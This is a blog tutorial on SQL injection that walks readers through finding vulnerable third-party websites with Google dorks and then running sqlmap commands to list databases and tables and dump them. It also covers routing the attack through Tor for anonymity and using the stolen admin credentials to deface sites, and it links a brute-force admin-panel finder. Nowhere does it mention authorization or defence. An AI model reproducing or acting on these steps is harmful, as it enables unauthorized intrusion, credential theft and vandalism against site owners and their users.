How to hack a database with sql injection – sqlmap

We all know websites need a database to store data. That is called s RDBMS – relational database management system. These databases store data in tables and columns so that it can be accessed easily. Server side languages like PHP can interact with SQL database with proper authentication and has read/write permission. Most of the sensitive information are stored in these databases like login credential. Hackers first preference is to take down a database so that he can login to the admin panel with the credentials he retrieved.

Sql injection is a method of exploiting a vulnerability in a server side script. Scripts that do not filter special chars properly are vulnerable to this attack. If a non filtered string is allowed to be in the query the string get executed as a query. This way of injecting custom crafted queries into a script is called sql injection.

Video Demo

consider a scenario: a php script that accepts a get parameter “name” and the script searches a table in a databse (eg url : www.example.com/search.php?name=bill).

The query looks like this

 

SELECT * FROM ‘profiles’ WHERE name = ‘bill’;

If you add a single quote at the end of the url

www.example.com/search.php?name=bill’ 

the query get executed like this :

SELECT * FROM ‘profiles’ WHERE name = ‘bill ‘ ‘;

This will give you a syntax error, this means the target is vulnerable. instead of the single quote we inject our custom queries to fetch the sensitive data.

 

Finding a target

You can randomly choose a target by google dorks. In the google search bar try the keyword:
inur:index.php?id=
you will get plenty of results, choose a target and open the url by adding a quote at the end. If the website shows a syntax error or a blank page the site is most probably vulnerable. Copy the target url to the clipboard. There are plenty other dorks try that too.

SQLMAP

Sqlmap is a python script exclusively designed for database attacks. Its very stable and have too many options. So lets start.
# sqlmap -u http://target.com/vuln.php?id=1 —-dbs

 

This is the first step. Sqlmap will scan the given parameter for all possible injection technique. Once you get a possible method sqlmap will ask whether you want to scan for more vulnerabilities. You can stop or continue, thats up to you. since we gave the “–dbs” option, sqlmap will retrieve the database names. Once you get the database name you can fetch tables and columns
# sqlmap -u http://target.com/vuln.php?id=1 -D database_name —-tables

After fetching database and tables, fetch columns

 

# sqlmap -u http://target.com/vuln.php?id=1 -D database_name -T table_name —-columns

Dump the data from the columns

 

# sqlmap -u http://target.com/vuln.php?id=1 -D database_name -T table_name -C column_name —-dump

 

 

 

Advanced

Sql map can be used with tor proxy for safe and anonymous attack
# sqlmap —-tor —-check-tor —-tor-type=SOCKS5 -u http://target.com/vuln.php?id=1 —-dbs

 

Increase the speed using multi-threading

 

# sqlmap —-threads 10 -u http://target.com/vuln.php?id=1 —-dbs
This will help you to get the admin login details. You can access to the control panel and deface the whole website. I have designed a simple script to find admin panel of a website. Download cpsan.py from GitHub. click here .

 

or directly clone by the command

 

# git-clone https://github.com/susmithHCK/cpscan.git

 

This python script bruteforce all the possible directories of a server and detects control panel by http response codes. This can detect almost 85% of websites. Hope this helped you guys. Any doubts or questions please use the comment box below.

susmith HCK

susmith HCK

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you. If you like all these stuffs add me on Facebook and Google plus.

You may also like...

5 Responses

  1. Whoa ! Thanks, Amazing Tutorial Man ! Keep sharing ..

  2. Thank you for the good writeup. It in fact was a amusement account it. Look advanced to far added agreeable from you! However, how can we communicate?

Leave a Reply

Your email address will not be published. Required fields are marked *